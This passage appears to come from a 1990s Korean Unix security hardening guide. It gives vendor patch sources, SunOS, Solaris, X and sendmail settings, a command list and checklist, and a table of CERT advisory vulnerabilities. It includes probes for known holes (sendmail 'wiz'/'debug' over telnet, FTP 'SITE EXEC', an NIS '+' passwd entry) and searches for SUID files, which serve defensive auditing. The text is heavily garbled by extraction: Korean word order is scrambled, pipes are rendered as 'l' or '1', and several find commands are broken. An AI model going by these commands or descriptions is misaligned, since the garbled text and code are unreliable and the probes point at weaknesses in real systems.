포트 모니터링을 가능토록 한다 다음 명령을 에 넣는다NFS . /etc/rc.local .
/bin/echo "nfs_portomon/W1" | /bin/adb -w /vmunix /dev/kmem > ₩
/dev/null 2>&1
rpc.mountd
2) Solaris 2.x
패치(Patches)○
ftp://sunsolve1.sun.com/pub/patches/*
포워딩 소스라우팅IP /○
이것은 을 베스트쳔호스트 나 이중네트워크호스트 으SUN (bastion host) (duel homed system)
로 사용할 경우에 필요하다 이것을 제거한다 제거하기 위해서는 에서 다. . /etc/rc.2.d/S69.inet
음과 같이 각 옵션을 로 만들고 재시동한다0 .
ndd -set /dev/ip ip_forwarding 0
ndd -set /dev/ip ip_ip_forward_src_routed 0
프레임버퍼 (Framebuffers, /dev/fbs)○
에서의 과 같은 프레임버퍼 보호기능이 있다SunOS 4.1.x /etc/fbtab .∙
는 프레임버퍼와 링크를 가진 디렉토리이며 는 과/dev/fbs , /etc/logindevperm login(1)∙
에 의해 사용된 정보를 가지고 있는데 콘솔로 로그인 로그아웃하여 디바이스의ttymon(1M) , /
소유 그룹 접근권한등의 변경 정보들을 가진다 디폴트로 이 파일은, , . keyboard, mouse,
과 디바이스를 가진다audio framebuffer .
#
# File: /etc/logindevperm
# Purpose: Specifies that upon login to /dev/console, the
# owner, group and permissions of all supported
# devices, including the framebuffer, will be set to
# the user's username, the user's group and 0600.
# Comments: SunOS specific.
# Note: You cannot use to continue a line. ₩
#
# Format:
# Device Permission Colon separated device list.
#
/dev/console 0600 /dev/kbd:/dev/mouse
/dev/console 0600 /dev/sound/* # audio devices
/dev/console 0600 /dev/fbs/* # frame burrers
포트 모니터링NFS○
포트모니터링을 가능하게 한다 이를 위해 에 다음을 추가한다NFS . /etc/system .
혹은set nfs:nfs_portmon = 1( et nfssrv:nfs_portmon = 1, Solar is 2.5)
3) IRIX
패치 보안/FAQ/ README○
ftp://ftp.auscert.org.au/pub/mirrors/sgigate.sgi.com/*
ftp://ftp.auscert.org.au/pub/mirrors/ftp.uu.net/sgi/security.Z
명령이 없는 경우 이 도울 수 있다chroot(1) chrootuid .○
도구를 사용한다 한정적인 보안 취약점들을 점검한다rscan . IRIXdp .○
4) AIX
패치○
ftp://ftp.auscert.org.au/pub/mirrors/software.watson.ibm.com/aix-patches
5) HP/UX
패치○
으로 메일을 보낸다 이때 메시지 본문에[email protected] .
send XXXX
를 기입한다 이때 특정한 패치명이며 예를 들어 다음과 같이 한다. XXXX , .
서비스의 가이드를 받고자 할 때send guide.txt ,
를 받고자 할 때send doc PHSS_4834 REAEME
원래의 게시물을 받을 때send doc HPSBUX9410-018 HP
혹은 으로 접근한다Web .
http://support.mayfield.hp.com/
6) OSF
패치○
ftp://ftp.auscert.org.au/pub/mirrors/ftp.service.digital.com/osf/<v>/ssrt*
ftp://ftp.service.digital.com/pub/osf/<v>/ssrt*
7) ULTRIX
패치○
ftp://ftp.auscert.org.au/pub/mirrors/ftp.service.digital.com/ultrix/<p>/<v>/ssrt*
ftp://ftp.service.digital.com/pub/ultrix/<p>/<v>/ssrt*
<p> : mips or vax <v> : Version
윈도우 보안8) X
의 문제xdm○
를 구하여 설치한다Xll Release6 .
년 이전의 을 사용하고 있다면 새로운 버전으로 바꾸어야 한다1995 xdm .
일반적인 보안X○
접근권한을 로 한다/tmpdml 1777 .
를 쓰도록 한다X magic cookie .
아무 호스트에게 접근허가를 주지 말아라.
파일에서 명령을 제거하라- Xsession ‘xhost +'
유용한 명령어 리스트9)
재시작inetd○
BSD commands
# /bin/ps -aux l /bin/grep inetd l /bin/grep -v grep
# /bin/kill -HUP <inetd-PID>
SVR4 commands
# /bin/ps -ef l /bin/grep inetd l /bin/grep -v grep
# /bin/kill -HUP <inetd-PID>
에 어떤 서비스가 등록되어 있는지 확인Portmapper○
# /usr/bin/rpcinfo -p
맵 재구성alias○
# /usr/bin/newaliases
만약 를 사용한다면 모든 클라이언트들에게도 효과를 가지도록 한다NIS .
# (cd /var/yp; /usr/bin/make aliases)
이 옵 가지고 있는지 점검Sendmail wizad tus○
% telnet hostname 25
wiz
debug
kill
quit
%
이때 경우 문제 있는 버전임“5nn error return"
로그 레벨을 로 설정Sendmail 9○
의 구성파일내에 다음과 같이 한다semdmail .∙
# log level
0L9
의 경우에는sendmail 8.7 ,∙
# log level
0 LogLevel=9
메일메세지에 대한 로그 레벨syslog○
에 다음 정의syslog.conf file
mail.info /dev/console
mail.info /var/adm/messages
이것이 효력을 발생하기 위해서는,
경우BSD∙
# /bin/ps - aux l /bin/grep syslogd l /bin/grep -v grep
# /bin/kill -HUP <syslog-PID>
경우SVR4∙
# /bin/ps -ef l /bin/grep syslogd l /bin/grep -v grep
# /bin/kill -HUP <syslog-PID>
재구성 및 재시작Sendmail○
# /usr/lib/sendmail -bz
모든 현재의 프로세스들을 죽이고 다시 시작시킨다sendmail .
경우BSD∙
# /bin/ps -aux 1 /bin/grep sendmail l /bin/grep -v grep
# /bin/kill <pid> #pid of every running sendmail process
# /usr/lib/sendmail -bd -q 1h
경우SVR4∙
# /bin/ps -ef 1 /bin/grep sendmail l /bin/grep -v grep
# /bin/kill <pid> #pid of every running sendmail process
# /usr/lib/sendmail -bd -q1h
가 를 지원하는지 점검ftpd SITE EXEC○
일반 사용자들∙
% telnet localhost 21
USER username
PASS password
SITE EXEC
사용자anonymous∙
% telnet localhost 21
USER ftp
PASS [email protected]
SITE EXEC
이때 경우 문제 있는 버전임“5nn error return"
를 사용하는지 점검anonymous ftp○
% ftp localhost
Connected to localhost
220 hostname FTP server ready
Name (localhost:username): anoymous
331 Guest login ok, send username as password
Password: [email protected]
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
필드에 이 정확하게 되어있는지 점검passwd *○
다음과 같이 를 가진 패스워드 필드에서 가 로그인되지 않으면 를 없애고 다* NIS NIS *∙
음 시험을 한다.
+:*:0:0:::
를 없애고 다시 로그인 한다 로그인하고 또한 로 로그인한다면 문제 있는 것이* . NIS +∙
며 만약 로 로그인은 안된다면 문제가 없는 것이다, + .
파일 찾기.exrc○
# /bin/find / -name '.exrc' -exec /bin/cat ; -print{}₩
파일 찾아 출력.forward○
# /bin/find / -name '.forward' -exec /bin/cat ; -print{}₩
의 실행 모드 제거/usr/lib/expreserve○
# /bin/chmod 400 /usr/lib/expreserve
기타○
의 소유주 및 모드를 정확하게 고치기/tmp∙
# /bin/chown root /tmp
# /bin/chgrp 0 /tmp
# /bin/chmod 1777 /tmp
모든 개방된 파일 디렉토리 찾기(World-wide) ,∙
# /bin/find / -type f ( -perm -2 -o -perm -20 ) -exec ls -lg₩ ₩ {}
;₩
# /bin/find / -type d ( -perm -2 -o -perm -20 ) -exec ls -ldg₩ ₩
;{}₩
파일 찾기SUID, SGID∙
# /bin/find / -type f ( -perm -004000 -o -perm -002000 ) -exec₩ ₩
ls₩
-lg ;{}
내에 일반 파일 찾기/dev∙
# /bin/find /dev -type f -exec ls -l ;{}₩
블록 및 문자형 특수 파일 찾기∙
# /bin/find / ( -type b -o -type c ) -print l grep -v '^/dev/'₩ ₩
를 이용할 때 마운트된 파일시스템 회피하기/bin/find NFS∙
# /bin/find / ( ! -fstype nfs -o -prune ) <expression>₩ ₩ ₩
의 예<expression>
-type f ( -perm -004000 -o -perm -002000 ) -exec ls -lg₩ ₩ {}
;₩
유닉스 인터네트 보안을 위한 점검 요약3. /
이 점검목록 요약은 임의의 기관에서 인터네트 보안 대책을 강구하고자 할때 따라야 할 순
서적인 절차 또는 기술적인 확인 절차로서 활용될 수 있다 해당 기관의 규모가 크고 보다. ,
완벽한 보안을 원한다면 여기에서 나열된 순서에 의해 하나씩 빠짐없이 모두 구현하고 실행
해야할 것이며 완벽하지는 않더라도 부분적으로 효과적인 보안 대책을 세우고자 할 경우에,
는 나름대로 선택적으로 구현할 수도 있다.
가 보안정책과 관리 방안 세우기.
어떤 기관에서의 보안 대책이란 넓은 의미에서는 일종의 위험관리적인 측면이 있다 이것은.
마치 시스템 생명주기 와 같이 순환적으로 실행되고 관리되어야 하는 것이다 다(Life Cycle) .
음 순서에 맞게 하나씩 보안관리 및 위험 분석을 진행한 후 이를 구현하고 교육과 인지를
통해 관리하면서 정기적 혹은 비정기적으로 감사 및 사후 관리를 실시하고 그 결과에 따라
적절하게 다시 수정 발전하게 되는 것이다.
이러한 과정에서 위험분석과 평가를 통해 현재 그 기관의 보안상태의 현황이 도출되고 이에
대한 대비책을 세우는데 드는 비용을 포함해서 보안계획이 도출되면 그에 따라 실행하고 유
지하면 되는데 유지관리 중 보안사고가 감사에 의해 문제점이 발견되면 다시 처음 과정으, ,
로 돌아가 수정하게 되는 것이다.
나 인터네트 유닉스 보안 상태 점검 체크 리스트 실행 및 대책 마련. /
인터네트 유닉스 시스템에서의 보안은 구체적인 기술적인 점검이 항상 요구되고 여기에 충/
족되지 않는다면 이를 보완해야 한다 다음은 하나씩 점검 일람표를 나열한 것으로서 이를.
주기적으로 수행할 필요가 있다.
==========================================================================
패치1.0
최근의 패치를 설치[ ]
네트워크 보안2.0
필터링[ ]
명령[ ] "r"
[ ] /etc/hosts.equiv
[ ] /etc/netgroup
[ ] $HOME/.rhosts
[ ] NFS
[ ] /etc/hosts.lpd
보안 터미널[ ] (Secure Terminal)
네트워크서비스[ ] (Network services)
[ ] tftp
[ ] /etc/services
[ ] tcp_wrapper
[ ] /etc/aliases
[ ] /Sendmail
[ ] majordomo
[ ] fingerd
[ ] UUCP
[ ] REXD
[ ] World Wide Web (WWW) - httpd
및 익명3.0 FTP FTP
버젼[ ]
[ ] Configuration
익명[ ] FTP
서버 구성[ ] FTP (Configuration)
접근 권한[ ]
쓰기 가능한 디렉토리[ ]
디스크 마운트[ ]
패스워드 및 계정 보안4.0
정책[ ]
사전 점검[ ]
내용[ ] NIS, NIS+, /etc/passwd
새도우 패스워드[ ]
관리[ ]
특수 계정[ ]
계정[ ] Root
파일[ ] .netrc
필드[ ] GCOS
파일시스템 보안5.0
일반[ ]
시작 및 끝 스크립트[ ]
[ ] /usr/lib/expreserve
외부파일 시스템 디바이스[ ] /
파일 접근 권한[ ]
실행 파일[ ] root
소유[ ] Bin
[ ] Tiger/COPS
[ ] Tripwire
업체별 유닉스 보안6.0
[ ] SunOS 4.1.x
패치[ ]
포워딩 소스 라우팅[ ] IP /
프레임버퍼[ ] (Framebuffers, /dev/fb)
[ ] /usr/kvm/sys/*
[ ] /usr/kvm/crash
[ ] /dev/nit (Network Inreface Tap)
모듈 옵션[ ] Loadable
[ ] Solaris 2.x
패치[ ]
포워딩 소스 라우팅[ ] IP /
프레임버퍼[ ] (Framebuffers, /dev/fbs)
[ ] IRIX
패치[ ]
[ ] AIX
패치[ ]
[ ] HPUX
패치[ ]
[ ] OSF
패치[ ]
[ ] ULTRIX
패치[ ]
윈도우 시스템 보안7.0 X
의 문제[ ] Xdm
보안 일반적인 것[ ] X -
==========================================================================
다 방화벽시스템의 구현의 고려.
만약 기관 내부의 등을 효과적으로 보호하려면 방화벽시스템만큼 우수한 보안대책도LAN
없을 것이다 이 경우 외부에서 내부로 들어오는 트래픽중 어떤 것을 막을 것인지 어느 정. ,
도의 로그를 시행할 것인지 허용하는 네트워크 응용서비스들은 어떤 것이 있는지 혹은 내, ,
부의 트래픽이 외부로 나가는 것도 제어할 것인지 등에 대한 정책이 수립되어야 한다 또한.
제품을 구매하여 구현할 것인지 공개 소프트웨어를 이용할 것인지 혹은 전문 컨설팅 회사, ,
의 도움이 필요한지 등의 정책도 결정해야 한다.
라 적절한 보안 도구들의 이용 고려.
다음에 나열된 보안 도구들을 설치 이용할 것인지를 고려해 본다.
Crack, Tiger/COPS, npasswd/passwd+, tcp_wrapper, Tripwire, cpm, C2 Package, smrsh,
md5/md5check, TAMU Package, Firewall, Tool Kit, sudo,...
보안 취약점 목록
본 부록에서는 보안취약점을 및 에서 정리한 내용을 수록CERT-Advisory 8LGM Advisory
한다 이러한 보안 취약점 데이터베이스를 정리하게된 목적은 다음과 같다. .
침해수법들을 한눈에 일목요연하게 정리함으로서 침해사고시 참조하고자 한다.○
이 침해수법들을 침해수법에 대한 명칭 이를 점검 가능한 프로그램이름 스캐너이름 대, , ,○
상운영체제이름 관련된 응용프로그램이름 나 문서 이름 위험성 정, , CERT 8lgm Advisory ,
도 얼마나 해커들이 자주 이용하는지에 대한 정도 침해수법에 대한 설명 등으로 분류하여, ,
정리함으로서 언제든 이 수법들에 대해 통계나 분석에 잘 이용될 수 있다.
시스템 침해수법 분석이나 점검도구 등의 개발시 이를 기본 데이터베이스로 활용하면 시○
스템별로 효과적인 프로그램이 가능하다.
현재 약 여가지를 정리하였는데 이밖에 에는 등록되어 있지는 않지만 해커들이160 Advisory
이용하는 기타 수법들에 대한 데이터베이스화는 계속 진행할 예정이며 현재 이 데이터베이,
스를 활용한 도구개발 등과 함께 동시에 진행할 예정이다.
본 데이터베이스에서 사용된 레코드에서의 필드명에 대한 설명은 다음과 같다.
필드명 필 드 설 명 비 고
VN Vulnerability Name 취약점 이름
PN Program Name 모듈 프로그램 이름 향후 개발시( ) -
OS OS & Version 운영체제 이름 및 버젼
AP Applications Name 취약한 응용프로그램 이름
AD Refered Advisory 등의 참조CERT, 8LGM Advisory
SL Severe Level 심각성 정도 높음 낮음(1 - 10, 1: , 10: )
PL Popularity Level 자주 발견되는 정도 많음 적음(A -C, A: , C: )
DE Description 취약점에 대한 대략적 설명
그리고 업체 운영체제 및 이의 약어는 다음과 같다, .
약어 운영체제명 약어 운영체제명
ADM Apollo Domain OVM OpenVMS
AIX IBM'S AIX SOL Solaris
BSD BSD(Berkeley UNIX) SUN SunOS
CVX CONVEX SV4 System V Release 4
DEC Digital UNIX ULT Ultrix
HPX HP/UX UNI Unisys
IRI Irix VMS DEC's VMS
LIN Linux WNT Windows NT
NEX NEXT
취약성VN passwd
PN passwd
OS BSD4.3
AP passwd
AD CA-89:01
SL 5
PL C
프로그램에 문제가 있다DE passwd .
취약성VN sun restore
PN sun_restore
OS SUN4.0, 4.0.1, 4.0.3
AP restore
AD CA-89:02
SL 7
PL C
가 권한을 가지는 프로그램이기 때문에 문제가 발생한다DE restore root setuid .
취약성VN telnet
PN telnet8903
OS *
AP telnet
AD CA-89:03
SL 5
PL B
외부로 연결되는 세션 사용자이름 패스워드 포함 을 기록할 수 있는 수DE login ( , )
정된 버전이 기존 프로그램을 대체하여 수행될 수 있다DE telnet .
네트워크에서의VN SPAP WAPK Worm
PN
OS DEC, VMS
AP
AD CA-89:04
SL 7
PL C
와 를 감염시키는 바이러스가 성행하고 있다 이 웜은 잘 관리되지 못한DE DEC VMS .
패스워드를 이용해 파일을 고치고 새로운 계정을 만든다 그리고DE .com . DECnet
을 통하여 감염된다DE .
의VN DEC/Ultrix 3.0 troijAP login
PN tlogin
OS ULT3.0
AP /usr/bin/login
AD CA-89:05
SL 5
PL B
변형된 트로이목마프로그램이다DE telnet, login .
취약성VN sun RCP
PN sun_rpc
OS SUN4.0.x
AP rpc
AD CA-89:07
SL 5
PL B
신뢰하는 시스템이면 어느 사용자가 를 통하여 다른 호스트에 관리자권DE RCP SUN
한의 명령을 수행할 수 있다DE .
문제VN Unisys U5000 /etc/passwd
PN etc_passwd
OS UNI
AP /etc/passed
AD CA-90:03
SL 1
PL A
업체에 의해 시스템 최초 제공시 루트권한을 가질수 있는 계정의 패스워드가DE ,
없음DE
문제VN Apollo Domain/suid_exec
PN suid_exec
OS ADM
AP /etc/suid_exec
AD CA-90:04
SL 5
PL A
이 파일은 에서 가 설정된 스크립트를 동작케 하는 것이다DE Korn Shell set-uid .
그러나 이파일이 존재하지 않아도 되므로 삭제해야 한다DE .
VN Sunview selection_svc vulnerability
PN select_svc
OS SUN 4.0.X
AP Sunview selection_svc
AD CA-90:05
SL 5
PL B
시스템에서 를 실행중일때 원격 시스템에서 이 시스템의 선택된 파일DE SunView ,
들 예 을 읽을 수 있다DE ( : passwd) .
시스템의 문제VN NeXT restore
PN restore0.9
OS NEX
AP /usr/etc/restore0.9
AD CA-90:06a
SL 5
PL
는 쉘스크립트로서 일반적으로 사용되지 않고 설치DE /usr/etc/restore0.9 setuid
과정에만 필요한 프로그램인데 이 파일이 존재하면 일반 사용자는 관리자의 권DE
한을 가질수 있다DE .
시스템의 문제VN NeXT printer
PN Nextprinter
OS NEX
AP /usr/lib/Nextprinter
AD CA-90:06b
SL 5
PL A
일반적으로 접근할수 있는 프린터가 있을 경우 일반 사용자는 이의 버그를 이DE
용 인가된 이상의 권한을 가질 수 있다DE .
시스템의 서버문제VN NeXT Window
PN next_window
OS NEX
AP
AD CA-90:06c
SL 5
PL A
서버를 통하여 외부 사용자가 시스템에 접근할 수 있다DE window .
시스템의 문제VN NeXT BuildDisk
PN BuildDisk
OS NEX
AP /NextApps/BuildDisk
AD CA-90:06d
SL 5
PL A
프로그램이 모든 사용자가 접근 할 수 있는 모드이면 이를 이용하여DE BuildDisk
루트의 권한을 가질수 있다DE .
문제VN VMS ANalyze/Process_dump
PN anal_dump
OS VMS
AP ANALYZE/PROCESS_DUMP
AD CA-90:07
SL 5
PL A
일반 사용자가 루틴을 이용하여 시스템 특권을 요구할DE ANalyze/Process_dump
수 있다DE .
의 문제VN IRIX 3.3 & 3.31 Mail
PN lrix_all
OS IRI
AP /usr/sbin/Mail
AD CA-90:08
SL 5
PL A
시스템에 들어온 사용자가 시스템상의 어느 사용자의 메일도 읽을 수 있다DE .
취약점VN SunOS TIOCCONS
PN TIOCCONS
OS SUN
AP
AD CA-90:12
SL 5
PL A
는 콘솔에 대한 입력 및 출력의 방향을 바꿀 수 있다DE TIOCCONS .
취약성VN SunOS /bin/mail
PN sun_mail9101a
OS SUN4.0.3, 4.1, 4.1.1
AP /bin/mail
AD CA-91:01a
SL 5
PL B
는 가 걸린 프로그램으로 일반사용자가 이를 이용하여 관DE /bin/mail root setuid
리자가 될 수 있다DE .
의 취약성VN SunOS in.telnetd
PN sun_telnet1
OS SUN4.1, 4.1.1
AP in.telnetd
AD CA-91:02a
SL 4
PL B
의 취약성으로 인하여 시스템의 사용자가 를 포함한 다른 사용DE in.telnetd root
자의 권한을 얻을 수 있다DE .
을 통한 패스워드 바꾸기VN mail
PN
OS *
AP
AD CA-91:03
SL 8
PL C
패스워드를 바꾸라는 거짓의 메일을 받을 경우 꼭 확인해봐야 한다DE .
의 취약성VN DEC Ultrix chroot
PN ult_chroot
OS ULT4.0, 4.1
AP /usr/bin/chroot
AD CA-91:05
SL 5
PL B
디폴트로 에서 는 접근권한이 잘못 설정되어 비인가된DE ultrix /usr/bin/chroot
권한을 가질 수 있다DE .
에서 사용자이름 의 취약성VN Next rexd, /private/etc, me
PN next_3
OS NeX
AP rexd, /private/etc
AD CA-91:06
SL 5
PL B
디폴트로 수행되는 는 원격지 사용자가 시스템의 프로세스를 실행할 수DE 1. rexd
있다DE .
DE 2. / 디렉토리가 그룹쓰기 허가가 되어 의 사용자는 그private/etc wheel group
디렉토리를 수정할 수 있다DE .
의 라는 사용자이름은 명령을 사용하여 가 될 수 있다DE 3. wheel group me su root .
의 설치시 취약성VN sun Source Tape
PN
OS SUN4.0.3, 4.1, 4.1.1
AP
AD CA-91:07
SL 7
PL C
의 소스들인 는 두 개의 파일 과DE SUN sunsrc setuid root (makeinstall, winstall)
이란 디렉토리를 생성하는 설치 절차를 가지고 있는데 이 두DE /usr/release/bin
개의 파일을 수행하면 일반 사용자가 가 될 수도 있다DE root .
시스템 의 에서의 취약성VN AT&T V /bin/login
PN V_login
OS SV4
AP login
AD CA-91:08
SL 4
PL B
의 버그로 인하여 비인가된 권한을 가지게 된다DE /bin/login .
의 의 취약성VN SUN rpc.mountd
PN sun_rpcmount
OS SUN
AP /usr/etc/rpc.mountd
AD CA-91:09
SL 5
PL B
파일에 자 이상의 호스트 리스트가 있으면 파일 시스템이 누DE /etc/exports 256
구에게나 마운트될 수 있다DE .
의 취약성VN lpd
PN sun_lpd
OS sun
AP /usr/lib/lpd
AD CA-91:10a
SL 3
PL B
의 문제점을 이용하여 는 파일시스템 화일들을 삭제DE remote print spooling lpd
하는데 쓰일 수가 있다DE .
의 취약성VN Ultrix LAT/Telnet Gateway
PN
OS ULT4.1, 4.2
AP LAT/Telnet gateway
AD CA-91:11
SL 7
PL C
서비스가 수행중인 서버에 접속된 터미널이나 모뎀은 비인가DE LAT/Telnet LAN
된 관리자 권한을 얻을 수 있다DE .
취약성VN Trusted Hosts Configuration
PN trustedhost
OS *
AP /etc/hosts.equiv, /etc/hosts.lpd, .rhosts
AD CA-91:12
SL 2
PL A
파일에 가 있으면 원격지 사용DE /etc/hosts.equiv, /etc/hosts.lpd, .rhosts “+”
자가 인가되지 않은 권한을 얻을 수 있다DE root .
취약성VN Ultrix mail
PN ultrix_mail
OS ULT4.1
AP /usr/bin/mail
AD CA-91:13
SL 5
PL B
의 취약점으로 인하여 사용자가 을 얻을 수 있게한다DE Ulttrix mail root shell .
취약성VN SGI IRIX /usr/sbin/fmt
PN IRIX_fmt
OS IRI3.2, 3.3
AP /usr/sbin/fmt
AD CA-91:14
SL 5
PL B
버전이하의 시스템에 로그인 할 수 있는 사용자는 다른 사용자의DE IRIX 4.0
메시지를 읽을 수 있다DE mail .
취약성VN Mac/PC NCSA Telnet
PN ncsa_telnet
OS MAC
AP NCSA Telnet
AD CA-91:15
SL 2
PL A
서버의 구현상 문제로 인하여 어떤 인터넷 사용자든지 를 이용해 기본DE ftp ftp
설정의 을 쓰는 또는 에 접근할 수 있고 어떤 파일이든 읽고DE NCSA Telnet PC MAC
쓸 수 있다DE .
취약성VN SunOS SPARC Integer Division
PN sun_interger
OS SUN4.1, 4.1.1
AP /sys/sun4/OBJ/crt.o
AD CA_91:16
SL 5
PL B
구조상의 문제점으로 인해 에 취약성이 존재하여 시스DE SPARC Integer Division
템에 로그한 사용자가 관리자의 권한을 얻을 수 있다DE .
취약성VN DECnet-Internet Gateway
PN
OS ULT4.0, 4.1, 4.2
AP DECnet-Internet gateway
AD CA-91:17
SL 5
PL 5
게이트웨이 설치시 호스트에 계정을DE Cnet-internet S/W Ultrix gateway guest
만드는데 이 계정은 디폴트로 을 쉘로 가지게 된다 게DE /bin/csh . Cnet-internet
이트웨이 를 사용하는 사용자는 이 계정을 이용하여 비인가된 관리자 권한을DE s/w
얻게 된다DE .
취약성VN tftp
PN tftp1 uvchecker, SATAP
OS *
AP tftp
AD CA-91:18
SL 5
PL B
제한되지않은 서비스는 중요한 시스템파일 예 들을 원격지 사용자DE tftp ( ,passwd)
가 가져갈 수 있게 한다DE .
취약성VN AIX TFTP Daemon
PN tftpd
OS AIX
AP /etc/tftpd 1.13.1.3
AD CA-91:19
SL 5
PL B
가 접근제한에 대한 방법을 제공하지 않았기에 인터넷의 어느 사용자DE tftpd tftp
나 중요한 시스템 파일들을 읽어갈 수 있다DE .
취약성VN /usr/ucb/rdist
PN rdist1 uvchecker
OS *
AP rdist
AD CA-91:20
SL 3
PL A
의 버그를 이용하여 프로그램을 생성하거나 비인가DE /usr/ucb/rdist setuid root
된 권한을 가질 수 있다DE .
와 의 패치VN SunOS NFS Jumbo fsirand
PN jumbo, fsirand
OS SUN4.1.1, 4.1, 4.0.3
AP jumbo, fsirand
AD CA-91:21
SL 4
PL B
시스템 고장 비인가된 시스템 접근 파일 소유 권한에 문제점DE 1. NFS jumbo : , ,
이 있다DE .
파일을 할당하는 방법과 관련 에 보안 문제가 있다DE 2. fsirand : NFS .
취약성VN SunOS Openwindows
PN openw
OS SUN4.1.1
AP Openwindows v.3.0
AD CA-91:22
SL 5
PL B
의 프로그램은 의 유효 를 사용하여 관리DE Openwindows v.3 setuid root UID(EUID)
자의 권한으로 다른 사용자의 프로그램을 실행시킬 수 있다DE .
의 취약성VN HP/Apollo Domain/OS crp
PN ap_crp
OS ADM
AP /usr/apollo/bin/crp
AD CA-91:23
SL 5
PL B
외부나 내부의 사용자가 를 사용중인 사용자의 권한을 얻을 수 있다DE crp .
취약점VN NeXTstep Netinfo Configuraion
PN nexconfchk
OS NEX
AP Netinfo-r2
AD CA-92:01
SL 3
PL A
서버의 기본 구성은 정보를 요청하는 모든 호스트에 대해 정보를 제공DE Netinfo
하도록 설정되어 있다 외부 사용자는 이를 이용하여 패스워드화일 같은 중요DE .
한 정보를 불법적으로 접근한다DE .
취약점VN AT&T /usr/etc/rexecd
PN rexecdchk
OS SVR4
AP /usr/etc/rexecd
AD CA-92:04
SL 3
PL B
원격사용자가 가 수행중인 호스트에 루트 권한으로 명령들을DE /usr/etc/rexecd
실행 할 수 있다DE .
취약점VN AIX rexd Daemon
PN aixrexd
OS AIX v3.1, AIX v3.2
AP rexd
AD CA-92:05
SL 5
PL B
이 수행중인 시스템에 인터넷사의 모든 사용자에게 관리자가 아니지 만 일DE rexd
반 사용자의 권한으로 시스템에 접근할 수 있도록 허용한다DE .
취약점VN AIX uucp
PN aixuucp
OS AIX v3.1 u2007~
AP uucp
AD CA-92:06
SL 5
PS B
는 잘못 구성된 몇몇 파일들을 포함하고 있으며 이점을 이용하여 일반 사DE uucp ,
용자들이 인가되지 않은 명령들을 실행시키거나 인가되지 않은 루트 권한을DE ,
얻을 수 있다DE .
취약점VN AIX /bin/passwd
PN aixpasswd
OS AIX v3.2, AIX v3.1 u2007
AP/bin/passwd
AD CA-92:07
SL 5
PL B
및 의 명령은 보안취약점을 가지고 있으며 이DE AIX v3.2 AIX v3.1 u2007 passwd ,
로인해 지역 사용자에게 인가되지 않은 관리자 권한을 허용할 수 있다DE .
취약점VN IPIX Ip
PN irixlp
OS IRIX v4.0.5-
AP Ip
AD CA-92:08
SL 4
PS B
시스템의 이전의 시스템이 기본시스템 소프트DE Sillicon Graphics IRIX v4.0.5
웨어 또는 시스템 관리자 소프트웨어 매체DE (“oee1.sw.unix") (“eoe2.sw.vadmin")
를 이용하여 설치되거나 업그레이드 된 경우 프로그램에 취약점이 발생하DE ,
게 되며 이로 인해 모든 지역 사용자에게 인가되지 않은 관리자 권한이 허용DE ,
될 수도 있다DE .
취약점VN AIX Anonymous FTP
PN aixaftp
OS AIX
AP/usr/lpp/tcpip/sampless/Anon.ftp
AD CA-92:09
SL 4
PL B
설치 스크립트인 로 일부 파일DE Anonymous FTP /usr/lpp/tcpip/sampless/Anon.ftp
및 디렉토리를 잘못 구성하여 서버를 운용할 경우 원격 사용자들에게 인가DE FTP
되지 않은 명령을 수행하거나 시스템에 인가되지 않은 접근을 할 수 있도록 허DE
용할 수 있다DE .
취약점VN AIX crontab
PN aixcrontab
OS AIX v3.2
AP crontab
AD CA-92:10
SL 4
PL B
의 은 보안 취약점을 가지고 있으며 이것은 지역 사DE AIX v3.2 /usr/bin/crontab ,
용자에게 인가되지 않은 관리자 권한을 허용할 수도 있다DE .
와 취약점VN SunOS Environment Variable siud/sgid
PN sunenvvar
OS SUNv4.O+
AP *
AD CA-92:11
SL 5
PL B
프로그램이 자신의 실제 및 유효를 서로 같은 값 단 프로그램을 수DE suid (
행시킨 사용자의 와는 다른 값 으로 변경시킨 후 동적 연결 프로그램을 실DE uid ) ,
행시키는 경우 보안 취약점이 발생하게 된다 유사한 취약점이 프로그DE , . sgid
램에도 발생한다DE .
특히 및 등이DE usr/lib/sendmail, /usr/bin/login, /usr/bin/su /usr/5bin/su
이 문제점에 대해 취약하다 또한 및 도 취약한DE . news, sudo, smount, npasswd
것으로 알려져 있다 이 취약점으로 인해 지역사용자에게 인가되지 않은 권한DE .
을 허용할 수 있다DE .
취약점VN SunOS /usr/etc/rpc. mountd
PN sunmountd1
OS SUN
AP /usr/etc/rpc.mountd
AC CA-92:12
SL 4
PL B
의 버그로 인해 특정 호스트만으로 접근이 제한되어 있는 된DE rcp.mountd export
파일 시스템이 인터넷상의 임의의 호스트에 의해 마운트될 수 있다DE NFS .
취약점VN SunOS NIS
PN sunnis
OS SUNv4.1.SUN v4.1.1,SUN v4.1.2
AP /usr/etc/ypserv, ypxfrd, portmap
AD CA-92:13
SL 4
PS A
및 의 는 취약점을 가지고 있으며 이로인해 정DE SunOS 4.1, 4.1.1, 4.1.2 NIS NIS
보에 대해 인가되지 않은 접근을 허용할 수도 있다 원격 호스트의 사용자가DE .
를 수행 중인시스템으로부터 맵의 복사본을 접근 할 수 있다DE NIS NIS .
취약점VN SunOS NFS
PN sunnfs
OS SUN v4.1, SUN v4.1.1, SUN v4.1.2
AP nfs
AD CA-92:15
SL 5
PS B
는 취약점을 가지고 있으며 이에 따라 침입자가 를 이용하여 관리 자권DE NFS , NFS
한을 취득할 수 있다 지원하는 모든 플렛폼에 대해 이 취약점을 가지고 있다DE . .
취약점VN SunOS lnteger mul/div
PN sunintem
OS SUN v4.1, SUN v4.1.1, SUN v4.1.2
AP lnteger Emulator
AD CA-92:15
SL 5
PS C
에서 정수 곱셈 나눗셈 에뮬레이션 코드가 취약점을DE SPARC SunOS / /(mul/div)
가지고 있으며 이 때문에 침입자는 관리자 권한을 얻거나 시스템을 파괴시킬DE ,
수 있다DE .
취약점VN SunOS I CMP Redirect
PN sunicmp
OS SUN v4.1, SUN v4.1.1, SUN v4.1.2
AP I cmp
AD CA-92:15
SL 5
PL C
는 서비스 거부 공격에 대한 취약점을 가지고 있고 이DE SunOS ICMP redirects ,
것을 이용하여 침입자가 현재의 네트워크 연결을 닫으므로 외부사용자가 네트DE
워크 서비스를 이용할 수 없게 된다DE .
취약점VN DEC VMS Monitor
PN decvmsmon
OS VMS v5.0, v5.4-2~
AP Momitor
AD CA-92:16
SL 5
PL B
유틸리티를 이용하여 인가된 사용자가 자신에게 인가되지 않은 특권을DE Monitor
취득할 수 있다 침해를 당하면 시스템 환경이 파괴될 위험이 있다DE . , .
취약점VN Cisco Access List
PN ciscoacclst
